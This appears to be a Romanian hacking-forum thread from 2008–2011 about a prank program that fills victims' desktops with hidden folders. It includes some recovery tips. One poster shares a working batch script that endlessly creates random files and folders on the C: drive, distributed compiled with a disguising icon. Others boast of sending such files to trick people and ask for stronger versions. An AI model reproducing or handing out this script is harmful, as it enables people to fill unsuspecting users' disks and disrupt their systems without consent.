Guest Praetorian Posted December 30, 2008 Report Posted December 30, 2008 Da-i restart la comp, apoi apesi F8 si iti apare un meniu.Selectezi de acolo Safe Mode. Quote
cmiN Posted December 30, 2008 Report Posted December 30, 2008 Puteai sa intrebi si asa de la inceput si primeai de la mine un raspuns de genul: "Ia incerca sa scrii repede pe google.com 'How to boot windows in safe mode' si sa vezi ce raspunsuri pizdete primeai ... sau puteai sa scrii si in romana ca tot romanul 'Cum deschid windowsul in safe mode' " si astfel pe viitor te mai "liiteai" si tu. Quote
bangy Posted December 31, 2008 Report Posted December 31, 2008 Am intrat in Safe Mode... apoi am intrat si in Task Manger...si imi aparea lista goala Daca ma poate ajuta cineva cu niste explicatii folositoare i-as fi recunoscator. Quote
a13x4nd7u Posted December 31, 2008 Report Posted December 31, 2008 cel mai bun antidot -nu te atingi de el- Nu.. Cel mai bun antidot, Linux. Quote
cmiN Posted December 31, 2008 Report Posted December 31, 2008 A lol eu acuma vad ce face codul ala ... poi nu e nimic grav:Ai intrat in el si ti-a creat vreo 1000 de foldere ascunse pe desktop.Booteaza windowsul normal cum il deschizi de obicei apoi cpanel -> folder options -> view -> debifezi hide extensions... si hide protected...., apoi pui biluta in Show hiden files... -> aply si okSi acum stergi tot ce ai in plus pe desktop ... mai exact da un search cu Win4P.S.: daca nu te descurci pur si simplu intri in codul ala si bagi promptul corect ... adica "rstz" =] Quote
zippy Posted January 1, 2009 Report Posted January 1, 2009 gata jumatate din astia de pe forum akuma ie hackeri doaamnee ami placea forumu asta inainte vorbea lume mai importanta si care aveai ce invata de la ei acum toti cacanari au gasit forumu si se cred hacari...**faza cu akuma ie hackeri am scriso la mijto! Quote
ZeroC00l Posted January 6, 2009 Report Posted January 6, 2009 (edited) Am folosit codul lui ZeroC00l.........si mi au disparut unele chestii de pe desktop... ma ajutati sa le recuperez?Daca ai bagat codul rstz atunci cand executzi programul, si tot nu ti s-au restaurat icoanele ineamna ca s-au mutat icoanele initiale peste limitele desktopului ... trebuie sa le aranjezi din nou deschizand in windows explorer desktopul si sa tragi fiecare icoana la locul unde a fost pe desktop (mi s-a intamplat si mie ... sucze pentru intarziere) Edited January 7, 2009 by ZeroC00l Quote
rMc.w0w Posted June 5, 2011 Report Posted June 5, 2011 La cati am dat tzeapa cu asta mersi de program.. Quote
Alecsillidan Posted June 5, 2011 Report Posted June 5, 2011 Uite aici un batch compilat, ocupa 253 kb pt ca este icon-ul mare @echo off:rstcenterecho RST>C:\%random%%random%.%random%md C:\%random%%random%%random%goto rstcenterPractic iti creaza un numar de fisiere egal cu 65500^65500^65500, faceti voi calculul, si rezultatul il inmultiti cu 2 (face acelasi numar de foldere).Revin cu o jucarie si mai a naibi mai incolo.In arhiva am pus si compiler-ul pentru batch-uri, e chiar usor de folositBanana Quote
*RaDu* Posted August 11, 2011 Report Posted August 11, 2011 Super,thx,e foarte folositor .bat-ul. Quote
gigaevil Posted August 11, 2011 Report Posted August 11, 2011 Uite aici un batch compilat, ocupa 253 kb pt ca este icon-ul mare @echo off:rstcenterecho RST>C:\%random%%random%.%random%md C:\%random%%random%%random%goto rstcenterPractic iti creaza un numar de fisiere egal cu 65500^65500^65500, faceti voi calculul, si rezultatul il inmultiti cu 2 (face acelasi numar de foldere).Revin cu o jucarie si mai a naibi mai incolo.In arhiva am pus si compiler-ul pentru batch-uri, e chiar usor de folositBananaSunt tare curios de unde ai scos tu numarul acela eu nu l-am gasit. Teoretic in codul tau nu ai nici o limita deoarece tu nu ai nici o variabila care sa ti-o salveze de fiecare data in stack folosind labelul rstcenter, astfel nu exista nici o limita de blocare a scriputul tau, doar daca masina virtuala de MS pentru bat-uri are vreo limita, dar nu as vedea de ce. Limita ar fi decat spatiu ai pe Hard-disk pentru a rula. Quote
g3oflo Posted August 14, 2011 Report Posted August 14, 2011 Un cod care actzioneaza asupra desktop'ului. este mai mic Quote
Alecsillidan Posted August 14, 2011 Report Posted August 14, 2011 Sunt tare curios de unde ai scos tu numarul acela eu nu l-am gasit. Teoretic in codul tau nu ai nici o limita deoarece tu nu ai nici o variabila care sa ti-o salveze de fiecare data in stack folosind labelul rstcenter, astfel nu exista nici o limita de blocare a scriputul tau, doar daca masina virtuala de MS pentru bat-uri are vreo limita, dar nu as vedea de ce. Limita ar fi decat spatiu ai pe Hard-disk pentru a rula.Variabila e %random%, care pardon e un numar ales la nimereala intre 0 si 32727, variabila e pusa de 3 ori deci 3 numere diferite intre intervalu ala, fa calculul cate posibilitati sunt. Nu trebuie definita, e interpretata ca un numar random de cmd.echo RST>C:\%random%%random%.%random% creaza un fisier cu 3 random-uri, 2 randomuri la nume si un random la extensie. Do the math!Incearcal sa vezi ca nu vorbesc prostii, sunt foarte bun la batch files Quote
eu2000 Posted September 21, 2011 Report Posted September 21, 2011 e super tare sa -i trimiti lu unu un fisier bat si sa-i faci desktopul plin de foldere .. uauuuuu bhaii ce tare e..... dar ce pula mea e asa de greu sa inchizi din task manager bat-ul .. sa-u sai dai un restart la pc ... deci .. bag ceva in bat-urile voastre .. le-am incercat .. sunt bun nimic de zis .. dar ceva mai puternic ...trebe .. Quote